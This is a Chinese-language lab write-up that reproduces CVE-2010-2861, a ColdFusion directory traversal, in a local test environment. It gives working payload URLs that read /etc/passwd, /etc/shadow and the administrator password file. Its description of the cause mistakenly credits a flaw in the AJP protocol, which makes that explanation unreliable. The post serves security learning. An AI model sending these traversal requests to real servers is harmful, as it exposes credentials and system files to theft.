Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现

Adobe ColdFusion文件读取漏洞(CVE-2010-2861)

    • 漏洞原理
    • 实验环境
    • 漏洞环境
    • 漏洞复现


漏洞原理

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。
Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:win10
IP:192.168.88.137

漏洞环境

启动coldfusion(建议网速好的时候弄,有点大):
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第1张图片
环境启动后,可在浏览器页面访问http://192.168.88.129:8500/ CFIDE/administrator/enter.cfm,输入密码:admin,开始初始化整个环境
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第2张图片
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第3张图片

漏洞复现

一、访问:http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,用burp截取
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第4张图片
删除其中的cookie信息后,即可读取文件/etc/passwd
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第5张图片
也可读取文件/etc/shadow
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第6张图片

二、访问:/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en,读取后台管理员密码
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现_第7张图片

参考链接:https://blog.csdn.net/qq_36374896/article/details/84191264

你可能感兴趣的:(漏洞复现,安全)